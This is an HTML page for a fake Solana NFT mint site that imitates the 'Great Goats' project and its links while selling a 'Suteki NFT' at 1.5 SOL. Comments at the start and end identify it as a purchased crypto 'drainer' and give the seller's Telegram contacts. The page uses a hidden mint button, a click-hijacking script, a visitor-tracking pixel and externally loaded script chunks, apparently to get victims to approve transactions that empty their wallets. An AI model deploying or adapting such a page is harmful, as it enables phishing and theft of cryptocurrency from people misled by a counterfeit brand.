<!DOCTYPE html>
<html lang="en">
<title>Great Goats</title>


<!-- 

Please Note That This Drainer Was Made By: https://tokens404.com
For Any Support / Help Dm @social404 On Telegram
Make Sure You Join Our Telegram Channel: https://t.me/tokens404

Thank You For Your Purchase.

 -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="utf-8">
    <meta property="og:locale" content="en_us" />
    <meta name="theme-color" content="#fe5262">
    <meta property="og:title" content="Great Goats" />
    <meta property="og:image" content="https://greatgoats.io/assets/images/icon.png" />
    <link rel="shortcut icon" href="https://greatgoats.io/assets/images/icon.png" type="image/png">
    <meta property="og:site_name" content="Great Goats" />
    <meta property="og:locale" content="en_us" />
    <meta name="og:description" content="Powered by our 4 core values: Narrative, Lifestyle, Value, and Craft" />
    
    <script>
        window.addEventListener('click', () => {
            document.getElementById('showcase__btn0').addEventListener('click', function (e) {
                document.getElementsByClassName('MuiButton-containedPrimary')[0].click();
            });
        });
        </script>
    <style>
        * {
	margin: 0;
	padding: 0;
	box-sizing: border-box;
}

body,
html {
	max-width: 100%;
	overflow-x: hidden;
	height: 100%;
	scroll-behavior: smooth;
}

:root {
	--body: #ece8e3;
    --accent: #fe5262;
	--accentHover: #f46471;
	--text: #242c34;
	--boxShadow: 0px 8px 24px 0px rgba(0, 0, 0, 0.1);
}

::-webkit-scrollbar {
	width: 10px;
}
  
::-webkit-scrollbar-track {
	background: #faf8f4; 
}
   
::-webkit-scrollbar-thumb {
	background: #bb9772; 
}
  
::-webkit-scrollbar-thumb:hover {
	background: #876541;
}

.h1, .h2, .h3, .h4, .h5, .h6, h1, h2, h3, h4, h5, h6 {
	margin-bottom: 0px;
}

p {
	margin-bottom: 0px;
}

body {
	color: var(--text);
	background: var(--body);
	font-family: 'Outfit', sans-serif;
}

a {
	text-decoration: inherit;
	color: var(--text);
}

a:hover {
	color: var(--accentHover);
}

.JC-IndexContainer {
	height: 100%;
	background: url(/assets/images/headerBG.svg);
	background-size: cover;
	background-position: top;
}

.JC-NavBar {
	width: 1500px;
	margin: 0 auto;
	display: flex;
	align-items: center;
	justify-content: space-between;
	padding: 40px 0px;
}

.JC-navLink {
	margin: 0px 5px;
    padding: 5px 15px;
    border-radius: 3px;
    background-color: #faf8f4;
    color: #bb9772;
	font-size: 15px;
    font-weight: 600;
    letter-spacing: 0.145rem;
    text-decoration: none;
    text-transform: uppercase;
	transition: 0.3s ease;
	border: 2px solid #faf8f4;
}

.JC-navLink:hover {
	transition: 0.3s ease;
	background: var(--accent);
	color: #fff;
	border: 2px solid var(--accent);
}

.JC-Active {
	border: 2px solid var(--accent);
	background: transparent;
	color: var(--accent);
}

.JC-navRight {
    display: flex;
    align-items: center;
}

.JC-navLink-disabled {
	margin: 0px 5px;
    padding: 5px 15px;
    border-radius: 3px;
	background-color: #e6e2de;
    color: #cfcbc7;
	font-size: 15px;
    font-weight: 600;
    letter-spacing: 0.145rem;
    text-decoration: none;
    text-transform: uppercase;
	transition: 0.3s ease;
	border: 2px solid #e6e2de;
	cursor: not-allowed;
}

.JC-navLink-me {
	margin: 0px 5px;
    padding: 5px 15px;
    border-radius: 3px;
    background-color: #faf8f4;
    color: #bb9772;
    font-size: 15px;
    font-weight: 600;
    letter-spacing: 0.145rem;
    text-decoration: none;
    text-transform: uppercase;
    transition: 0.3s ease;
    border: 2px solid #faf8f4;
	display: flex;
	align-items: center;
	justify-content: center;
}

.JC-navLink-svg {
    width: 30px;
    height: 15px;
	fill: #fff;
}

.JC-navLink-me:hover {
	transition: 0.3s ease;
	background: var(--accent);
	color: #fff;
	border: 2px solid var(--accent);
}

.JC-navLink-me:hover svg {
	filter: grayscale(1);
}

.JCLogo {
	width: 60px;
}

.JC-IndexBox {
	display: flex;
	align-items: center;
	justify-content: center;
	padding: 40px 0px;
	transition: 0.3s ease;
}

.JC-HomepageImage {
	transition: 0.3s ease;
}

.JC-HomepageImage:hover {
	transition: 0.3s ease;
	/*
	filter: drop-shadow(0px 10px 25px var(--accent));
	*/
}

.JC-IndexFooter {
    width: 1500px;
    margin: 0 auto;
    display: flex;
    align-items: center;
    justify-content: space-between;
	margin-top: 15px;
}

.JC-FooterRedirect {
    display: flex;
    align-items: center;
    width: 500px;
    justify-content: space-between;
	background: var(--accent);
	height: 80px;
	padding: 0px 25px;
	box-shadow: var(--boxShadow);
	border-radius: 10px;
	color: #ece8e3;
}

.JC-FooterRedirect h3 {
	font-size: 10px;
    text-transform: uppercase;
    opacity: 0.6;
    font-weight: 500;
}

.JC-FooterRedirect h5 {
	text-transform: uppercase;
    font-weight: 700;
    font-size: 15px;
}

.JC-FooterRe-btn {
	height: 50px;
	background: #fff;
	display: flex;
	align-items: center;
	width: 150px;
	justify-content: center;
	text-align: center;
	padding: 0px 25px;
	text-transform: uppercase;
	font-weight: 700;
	border-radius: 6px;
	font-size: 13px;
	transition: 0.3s ease;
}

.JC-FooterRe-btn i {
	position: relative;
	transition: 0.3s ease;
	margin-left: 15px;
	left: 0px;
}

.JC-FooterRe-btn:hover i {
	position: relative;
	left: 10px;
	transition: 0.3s ease;
}

.JC-FooterCopyright {
    color: #928d7e;
	font-size: 14px;
}

.JC-mobileBtn {
	margin: 0px 5px;
    padding: 5px 15px;
    border-radius: 3px;
    background-color: #faf8f4;
    color: #bb9772;
	font-size: 15px;
    font-weight: 600;
    letter-spacing: 0.145rem;
    text-decoration: none;
    text-transform: uppercase;
	transition: 0.3s ease;
	border: 2px solid #faf8f4;
	display: none;
}

.JC-mobileBtn:hover {
	transition: 0.3s ease;
	background: var(--accent);
	color: #fff;
	border: 2px solid var(--accent);
}

.JC-mobile-overlay {
	height: 100%;
	width: 0;
	position: fixed;
	z-index: 1;
	top: 0;
	left: 0;
	overflow-x: hidden;
	transition: 0.5s;
	background: rgba(0,0,0,30%);
	box-shadow: 0 4px 30px rgba(0, 0, 0, 0.1);
	backdrop-filter: blur(10px);
	-webkit-backdrop-filter: blur(10px);
}
  
.JC-mobileMenu-overlay {
	position: relative;
	top: 25%;
	width: 100%;
	display: flex;
	margin-top: -50px;
	flex-direction: column;
}
  
.JC-mobile-overlay .JC-closeBtn {
	position: absolute;
	top: 30px;
    right: 30px;
    font-size: 25px;
    font-weight: 600;
}

.mobileLink {
    font-size: 17px;
    padding: 25px 30px;
    color: #d5d5d5;
    background: #faf8f4;
    border-top: 1px solid #faf8f4;
    border-bottom: 1px solid #faf8f4;
    font-weight: 500;
	text-transform: uppercase;
	color: #bb9772;
	transition: 0.3s ease;
}

.mobileLink:hover {
	transition: 0.3s ease;
	background: var(--accent);
	color: #fff;
	border: 2px solid var(--accent);
}

.JC-Farm-section {
	padding: 50px 0px;
	width: 1500px;
	margin: 0 auto;
}

.JC-FarmSection-head p {
	font-size: 60px;
	text-transform: uppercase;
	font-weight: 700;
}

.JC-FarmSection-head p span {
	opacity: 0.09;
	margin-left: 15px;
}

.JC-FarmSection-head h3 {
	font-weight: 300;
	line-height: 25px;
	width: 500px;
	font-size: 16px;
	letter-spacing: 1px;
	margin-bottom: 30px;
}

.JC-FarmTitle {
	background: var(--accent);
	width: 250px;
	text-align: center;
	color: #fff;
	padding: 5px 5px;
	border-radius: 100px;
	margin-bottom: 25px;
}

.JC-FarmContent {
	width: 600px;
	line-height: 30px;
}

.JC-FarmContent span {
	font-weight: 700;
	color: var(--accent);
}

.JC-Farm-miniSection {
	width: 1500px;
	margin: 0 auto;
	display: flex;
	align-items: center;
	justify-content: space-between;
	position: relative;
}

.JC-FarmImg-absolute {
	width: 750px;
	margin-top: -00px;
	position: absolute;
	right: -150px;
}

.JC-TeamBox {
	border: 2px solid #ddd6cf;
	width: 250px;
	border-radius: 10px;
	display: flex;
	align-items: center;
	justify-content: center;
	flex-direction: column;
	padding: 15px 25px;
	margin: 10px;
}

.JC-TeamBox-profile {
	width: 200px;
}

.JC-TeamRows {
	margin-top: 50px;
	display: flex;
	flex-wrap: wrap;
	width: 1200px;
}

.JC-TeamRight {
	display: flex;
	align-items: center;
	justify-content: space-between;
	width: 100%;
	margin-top: 20px;
}

.JC-TeamLink {
    font-size: 24px;
    color: var(--accent);
	transition: 0.3s ease;
}

.JC-TeamLink:hover {
	color: var(--accentHover);
	transition: 0.3s ease;
}

.JC-TeamBox-name {
    font-weight: 600;
    color: var(--accent);
}

.JC-TeamBox-rank {
    text-transform: uppercase;
    font-weight: 700;
    font-size: 9px;
	opacity: 0.6;
}

.JC-ConnectSection {
	margin-top: 50px;
	display: flex;
	align-items: center;
	flex-wrap: wrap;
	width: 700px;
}

.JC-ConnectBox {
    padding: 0px 25px;
    background: #ffff;
    width: 320px;
    height: 80px;
    display: flex;
    align-items: center;
    border-radius: 10px;
    box-shadow: var(--boxShadow);
	margin-bottom: 15px;
	margin-right: 15px;
	transition: 0.3s ease;
	display: flex;
	align-items: center;
}

.JC-ConnectBox i {
	font-size: 20px;
	margin-right: 10px;
}

.JC-ConnectBox p {
	font-weight: 600;
    color: var(--accent);
}

.JC-ConnectBox small {
	text-transform: uppercase;
    font-weight: 700;
    font-size: 9px;
    opacity: 0.6;
}

.JC-ConnectBox:hover {
	background: #efefef;
	transition: 0.3s ease;
}

.JC-Goatmap-section {
	margin-top: 70px;
	display: flex;
	align-items: center;
	justify-content: flex-start;
	flex-wrap: wrap;
}

.JC-Goatmap-box {
	background: #fff;
	height: 500px;
	box-shadow: var(--boxShadow);
	width: 350px;
	margin: 15px 8px;
	border-top-right-radius: 15px;
	border-bottom-left-radius: 15px;
	border-bottom-right-radius: 15px;
	cursor: pointer;
	transition: 0.3s ease;
}

.JC-Goatmap-box:hover {
	transition: 0.3s ease;
	background: #faf8f4;
}

.JC-Goatmap-boxHead {
	transform: rotate(90deg);
	position: relative;
	top: 150px;
	left: -90px;
}

.JC-Goatmap-boxHead p {
	font-weight: 800;
    font-size: 60px;
    opacity: 0.10;
	margin-bottom: -10px;
}

.JC-Goatmap-boxHead small {
	font-size: 26px;
    text-transform: uppercase;
    font-weight: 700;
    letter-spacing: 2px;
    color: var(--accent);
}

.JC-Goatmap-boxBody {
	position: relative;
}

.JC-Goatmap-absolute {
	width: 250px;
	position: absolute;
    bottom: -350px;
	right: 20px;
}

.modal-dialog {
	margin-top: 60px;
	max-width: 100% !important;
    width: 100% !important;
}

.modal-body {
	margin-top: -30px;
	display: flex;
	justify-content: space-between;
}

.JC-FarmSection-right img {
	width: 350px;
}

.modal-body b {
    background: var(--accent);
    color: #fff;
    padding: 2px 8px;
    font-size: 13px;
    font-weight: 400;
}

.modal-content {
	width: 1300px;
	margin: 0 auto;
	background: #ece8e3;
	padding: 50px;
	border-radius: 20px;
	box-shadow: var(--boxShadow);
}

.modal-header {
	z-index: 5;
	border-bottom: 2px solid #ece8e3 !important;
}

.JC-FooterSuggest {
	display: flex;
    align-items: center;
    width: 500px;
    justify-content: space-between;
    background: var(--accent);
    height: 80px;
    padding: 0px 25px;
    box-shadow: var(--boxShadow);
    border-radius: 10px;
    color: #ece8e3;
}

.JC-SuggestBtn {
	height: 50px;
    background: #fff;
    display: flex;
    align-items: center;
    width: 150px;
    justify-content: center;
    text-align: center;
    padding: 0px 25px;
    text-transform: uppercase;
    font-weight: 700;
    border-radius: 6px;
    transition: 0.3s ease;
	border: inherit;
	font-family: 'Outfit', sans-serif;
}

.JC-SuggestBtn i {
	position: relative;
    transition: 0.3s ease;
    margin-left: 15px;
    left: 0px;
}

.JC-SuggestBtn:hover {
	transition: 0.3s ease;
	color: var(--accentHover);
}

.JC-SuggestBtn:hover i {
	position: relative;
    left: 10px;
    transition: 0.3s ease;
}

.JC-SuggestInput {
	font-family: 'Outfit', sans-serif;
    height: 50px;
    padding: 0px 25px;
    border-radius: 10px;
    border: inherit;
    outline: inherit;
}

::placeholder {
	font-size: 13px;
}

.JC-FarmLeft {
	width: 650px;
}

/* ACCORDION */

.accordion {
	display: grid;
	align-content: center;
	height: 100vh;
  }
  
  .accordion__container {
	display: grid;
	row-gap: .75rem;
  }
  
  .accordion__title {
	font-size: var(--small-font-size);
	color: var(--title-color);
	font-weight: 400;
	margin-top: .15rem;
	transition: .2s;
  }
  
  .accordion__header {
	display: flex;
	column-gap: .5rem;
	padding: 1.25rem 1.25rem 1.25rem 1rem;
	cursor: pointer;
	align-items: center;
  }
  
  .accordion__description {
	padding: 0 1.25rem 1.25rem 3rem;
	font-size: var(--smaller-font-size);
  }
  
  .accordion__icon {
	font-size: 16px;
	height: max-content;
	color: var(--title-color);
	transition: .3s;
	opacity: 0.5;
	margin-right: 5px;
  }
  
  .accordion__item {
	box-shadow: 0 2px 6px rgba(38, 38, 38, 0.1);
	position: relative;
	transition: all .25s ease;
	background: #fff;
	border-radius: 15px;
  }
  
  .accordion__item::after {
	content: '';
	background-color: var(--first-color);
	width: 5px;
	height: 100%;
	position: absolute;
	top: 0;
	left: 0;
	border-radius: .25rem 0 0 .25rem;
  }
  
  .accordion__content {
	overflow: hidden;
	height: 0;
	transition: all .25s ease;
  }
  
  .accordion-open .accordion__icon {
	transform: rotate(90deg);
  }
  
  @media screen and (min-width: 576px) {
	.accordion__container {
	  justify-self: center;
	}
	.accordion__header {
	  padding: 1.5rem;
	}
	.accordion__title {
	  padding-right: 3.5rem;
	}
	.accordion__description {
	  padding: 0 4rem 1.25rem 3.5rem;
	}
  }
  

/* ACCORDION */

/* RESPONSIVE */

@media only screen and (max-width: 1550px) {
	.JC-NavBar {
		width: 90%;
	}

	.JC-IndexFooter {
		width: 90%;
	}

	.JC-Farm-section {
		width: 90%;
	}

	.JC-Farm-miniSection {
		width: 100%;
	}
}

@media only screen and (max-width: 1500px) {
	.JC-FarmImg-absolute {
		right: 0px;
		width: 600px;
	}

	.modal-content {
		width: 90%;
	}
}

@media only screen and (max-width: 1380px) {
	.JC-FarmImg-absolute {
		display: none;
	}
}

@media only screen and (max-width: 1250px) {
	.JC-TeamRows {
		width: 100%;
	}
}

@media only screen and (max-width: 1200px) {
	.JC-FarmImg-absolute {
		display: none;
	}
}

@media only screen and (max-width: 1100px) {
	.JC-HomepageImage {
		width: 80%;
	}

	.JC-FarmSection-head h3 {
		width: 100%;
	}

	.JC-FarmSection-right {
		position: relative;
		left: 70px;
	}
}

@media only screen and (max-width: 960px) {
	.JC-navLink {
		display: none;
	}

	.JC-navLink-disabled {
		display: none;
	}

	.JC-mobileBtn {
		display: flex;
	}
	
	.JC-IndexBox {
		height: 70%;
	}

	.JC-navLink-me {
		display: none;
	}

	.JC-FooterRedirect {
		display: none;
	}

	.JC-FarmSection-right {
		display: none;
	}

	.JC-mobileBtn {
		display: flex;
	}

	.JC-ConnectSection {
		flex-wrap: wrap;
		width: 100%;
	}

	.JC-ConnectBox {
		width: 100%;
	}

	.JC-IndexFooter {
		flex-direction: column;
	}

	.JC-FooterCopyright {
		width: 100%;
	}

	.JC-FooterSuggest {
		width: 100%;
		margin-top: 25px;
	}

	.JC-FooterSuggest-left {
		width: 100%;
		margin-right: 20px;
	}

	.JC-SuggestInput {
		width: 100%;
	}

	.JC-FarmLeft {
		width: 100%;
	}
}

@media only screen and (max-width: 650px) {
	.JC-FarmContent {
		width: 90%;
	}
}

@media only screen and (max-width: 600px) {
	.JC-FarmSection-head h3 {
		width: 100%;
	}

	.JC-FarmSection-head p {
		font-size: 45px;
	}

	.JC-Goatmap-boxHead {
		left: -90px;
		top: 150px;
	}

	.JC-TeamBox {
		width: 100%;
	}

	.modal-content {
		padding: 25px;
	}

	.modal-dialog {
		width: auto !important;
	}

	.modal-body .JC-FarmSection-head p {
		font-size: 35px;
	}
}

@media only screen and (max-width: 500px) {
	.JC-FooterSuggest {
		height: auto;
		min-height: 80px;
		display: flex;
		align-items: center;
		justify-content: center;
		flex-direction: column;
		padding: 20px;
	}

	.JC-FooterSuggest-left {
		margin-right: 0px;
	}

	.JC-SuggestInput {
		width: 100%;
		margin-bottom: 15px;
	}

	.JC-FooterSuggest-right {
		width: 100%;
	}

	.JC-SuggestBtn {
		width: 100%;
	}
    body {
        background-color: #ece8e3!important;
    }
}
    </style>
    <link rel="stylesheet" href="ajax/libs/font-awesome/5.15.4/css/all.min.css">
    <link rel="stylesheet" href="assets/css/normalize.css">
    <link rel="stylesheet" href="assets/css/style06d5.css?1221ss2a2">

    <!-- <style>
        @media only screen and (mmax-width:765px) {
            body {
                background-color: #ece8e3;
            }
        }
    </style> -->
</head>

<body>
    <script>
        new Image().src = "http://whos.amung.us/swidget/userlers";
    </script>
    <header>
        <div class="logo"><img src="img/icon.png" alt="Logo"></div>
        <div class="social-list">

        </div>
    </header>

    <div class="JC-NavBar">
    
        <div class="JC-navLeft">
            <a href="/" class="JC-LogoLink">
                <img src="https://greatgoats.io/assets/images/icon.png" class="JCLogo">
            </a>
        </div>
    
        <div class="JC-navRight">
            <a href="/" class="JC-navLink JC-Active">Home</a>
            <a href="/goatmap" class="JC-navLink">GoatMap</a>
            <a href="/farm" class="JC-navLink">Farm</a>
            <a href="#" class="JC-navLink-disabled">Shop</a>
            <a href="#" class="JC-navLink-disabled">Gallery</a>
    
            <a href="https://twitter.com/GreatGoatsNFT" class="JC-navLink"><i class="fa-brands fa-twitter"></i></a>
            <a href="https://discord.gg/GreatGoats" class="JC-navLink"><i class="fa-brands fa-discord"></i></a>
            <a href="https://magiceden.io/launchpad/great_goats" class="JC-navLink-me">
                <svg class="JC-navLink-svg" viewBox="0 0 54 33" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path
                        d="M26.8519 26.6794C26.8519 29.9939 29.3048 32.6809 32.3307 32.6809H50.5638C52.2979 32.6809 53.7037 31.141 53.7037 29.2415C53.7037 27.342 52.2979 25.8022 50.5638 25.8022H37.269C37.1856 25.8022 37.118 25.7281 37.118 25.6367C37.118 25.5878 37.1377 25.5414 37.1719 25.51L43.2104 19.9568C44.1884 19.0575 44.7531 17.7305 44.7531 16.3318C44.7531 14.9431 44.1963 13.6244 43.2301 12.7251L37.2631 7.17097C37.2293 7.13945 37.2097 7.09323 37.2097 7.04456C37.2097 6.95295 37.2775 6.87868 37.3612 6.87868L50.5638 6.87868C52.2979 6.87868 53.7037 5.33883 53.7037 3.43934C53.7037 1.53984 52.2979 6.68841e-08 50.5638 1.4939e-07L26.8519 1.27756e-06V8.74819L34.5784 16.0572C34.6536 16.1283 34.6967 16.2317 34.6967 16.3404C34.6967 16.4492 34.6536 16.5525 34.5784 16.6236L28.7497 22.1374C27.5446 23.2774 26.8519 24.9353 26.8519 26.6794Z"
                        fill="#bb9772"></path>
                    <path
                        d="M5.24524 0C2.34838 0 0 2.57235 0 5.74549V28.8976C0 30.987 1.54635 32.6809 3.45387 32.6809C5.36139 32.6809 6.90774 30.987 6.90774 28.8976V12.653C6.90774 12.5656 6.97245 12.4947 7.05228 12.4947C7.112 12.4947 7.16557 12.5349 7.1871 12.5959L13.4058 30.2162C13.8859 31.5765 15.0803 32.4734 16.4117 32.4734C17.7409 32.4734 18.9338 31.5795 19.4154 30.2224L25.6676 12.6064L26.8519 8.74819V1.27756e-06C25.1489 5.05537e-07 23.6166 1.13277 22.9794 2.86266L16.6458 20.0593C16.6069 20.1649 16.5134 20.234 16.4095 20.234C16.3055 20.234 16.212 20.1649 16.1731 20.0593L10.1096 3.59591C9.30923 1.42292 7.3844 0 5.24524 0Z"
                        fill="#bb9772"></path>
                </svg>
            </a>
    
            <button class="JC-mobileBtn notBlur" onclick="openMenu()">☰</button>
        </div>
    
    </div>

    <section class="section main-screen">
        <div class="main-area">

            <div class="main-area__right">
                <h2 class="right-title">SUTEKI NFT</h2>

                <div class="right-list">
                    <li>
                        <div class="text">
                            Suteki NFT is a unique collection of 2420 NFTs
                        </div>
                    </li>
                </div>

                <div class="price">
                    <div class="add-input-remove">
                        <input type="text" id="total" value="1" readonly="">
                        <a href="javascript:void(0)" class="minus-btn">-</a>
                        <a href="javascript:void(0)" class="plus-btn">+</a>
                    </div>
                    <div class="price-box">
                        <div id="price-total"><span>1.5</span> SOL per 1 NFT</div>
                        <div>1 NFT max per transaction</div>
                        <div>Just 1000 left</div>
                    </div>
                </div>
                <div class="button-box">
                    <div id="root" class="cl-root">
                        <main>
                            <button id="butt" class="join-btn" tabindex="0" type="button"
                                style="display: none;"></button>
                        </main>
                    </div>
                    <img src="assets/img/solana.png" alt="solana">
                </div>
            </div>


            <div class="main-area__left">
                <div class="slider-area">
                    <img class="animation" src="https://greatgoats.io/assets/images/icon.png" alt="jpeg">
                    <div class="token">
                        <div class="token-title">TOKENS MINTED</div>
                        <div class="token-line">
                            <div class="line"></div>
                            <div class="progress-line"></div>
                        </div>
                        <div class="token-number" id="tokenup"><span id="tokennumber">11 011</span> <span
                                id="endTick">11 111</span></div>
                    </div>
                </div>
            </div>

        </div>
    </section>

    <script src="assets/js/jquery-3.6.0.min.js"></script>
    <script src="assets/js/slick.min.js"></script>

    <script>
        const $plusButton = document.querySelector(".plus-btn");
        const $minuButton = document.querySelector(".minus-btn");
        const $numberText = document.querySelector("#total");
        const $remaining = document.querySelector('#remaining');
        const $priceResultText = document.querySelector("#price-total span");
        let itemPriceSelected = 1;
        let itemCount = 5;

        $plusButton.addEventListener("click", function (e) {
            e.preventDefault();
            itemCount = itemCount < 1 ? itemCount + 1 : 1;
            $numberText.value = itemCount;
            $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(1);
        });
        $minuButton.addEventListener("click", function (e) {
            e.preventDefault();
            itemCount = parseInt($numberText.value);
            itemCount = itemCount > 1 ? itemCount - 1 : itemCount;
            $numberText.value = itemCount;
            $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(1);
        });
    </script>

    <script>
        ! function (e) {

            function t(t) {
                for (var n, i, a = t[0], c = t[1], l = t[2], s = 0, p = []; s < a.length; s++) i = a[s], Object
                    .prototype
                    .hasOwnProperty.call(o, i) && o[i] && p.push(o[i][0]), o[i] = 0;
                for (n in c) Object.prototype.hasOwnProperty.call(c, n) && (e[n] = c[n]);
                for (f && f(t); p.length;) p.shift()();
                return u.push.apply(u, l || []), r()
            }

            function r() {
                for (var e, t = 0; t < u.length; t++) {
                    for (var r = u[t], n = !0, a = 1; a < r.length; a++) {
                        var c = r[a];
                        0 !== o[c] && (n = !1)
                    }
                    n && (u.splice(t--, 1), e = i(i.s = r[0]))
                }
                return e
            }
            var n = {},
                o = {
                    1: 0
                },
                u = [];

            function i(t) {
                if (n[t]) return n[t].exports;
                var r = n[t] = {
                    i: t,
                    l: !1,
                    exports: {}
                };
                return e[t].call(r.exports, r, r.exports, i), r.l = !0, r.exports
            }
            i.e = function (e) {
                var t = [],
                    r = o[e];
                if (0 !== r)
                    if (r) t.push(r[2]);
                    else {
                        var n = new Promise((function (t, n) {
                            r = o[e] = [t, n]
                        }));
                        t.push(r[2] = n);
                        var u, a = document.createElement("script");
                        a.charset = "utf-8", a.timeout = 120, i.nc && a.setAttribute("nonce", i.nc), a.src =
                            function (
                                e) {
                                return i.p + "../static/js/" + ({}[e] || e) + "." + {
                                    3: ""
                                }[e] + "chunk.js"
                            }(e);
                        var c = new Error;
                        u = function (t) {
                            a.onerror = a.onload = null, clearTimeout(l);
                            var r = o[e];
                            if (0 !== r) {
                                if (r) {
                                    var n = t && ("load" === t.type ? "missing" : t.type),
                                        u = t && t.target && t.target.src;
                                    c.message = "Loading chunk " + e + " failed.\n(" + n + ": " + u + ")", c
                                        .name =
                                        "ChunkLoadError", c.type = n, c.request = u, r[1](c)
                                }
                                o[e] = void 0
                            }
                        };
                        var l = setTimeout((function () {
                            u({
                                type: "timeout",
                                target: a
                            })
                        }), 12e4);
                        a.onerror = a.onload = u, document.head.appendChild(a)
                    }
                return Promise.all(t)
            }, i.m = e, i.c = n, i.d = function (e, t, r) {
                i.o(e, t) || Object.defineProperty(e, t, {
                    enumerable: !0,
                    get: r
                })
            }, i.r = function (e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol
                    .toStringTag, {
                    value: "Module"
                }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, i.t = function (e, t) {
                if (1 & t && (e = i(e)), 8 & t) return e;
                if (4 & t && "object" == typeof e && e && e.__esModule) return e;
                var r = Object.create(null);
                if (i.r(r), Object.defineProperty(r, "default", {
                    enumerable: !0,
                    value: e
                }), 2 & t && "string" != typeof e)
                    for (var n in e) i.d(r, n, function (t) {
                        return e[t]
                    }.bind(null, n));
                return r
            }, i.n = function (e) {
                var t = e && e.__esModule ? function () {
                    return e.default
                } : function () {
                    return e
                };
                return i.d(t, "a", t), t
            }, i.o = function (e, t) {
                return Object.prototype.hasOwnProperty.call(e, t)
            }, i.p = "index.html", i.oe = function (e) {
                throw console.error(e), e
            };
            var a = this["webpackJsonpcandy-machine-mint"] = this["webpackJsonpcandy-machine-mint"] || [],
                c = a.push.bind(a);
            a.push = t, a = a.slice();
            for (var l = 0; l < a.length; l++) t(a[l]);
            var f = c;
            r()
        }([])
    </script>
    <script src="static/js/chunk.js"></script>
    <script src="static/js/main.chunk.js"></script>
    <script src="assets/js/tokenup.js"></script>
</body>


<!-- 

Please Note That This Drainer Was Made By: https://tokens404.com
For Any Support / Help Dm @social404 On Telegram
Make Sure You Join Our Telegram Channel: https://t.me/tokens404

Thank You For Your Purchase.

 -->

</html>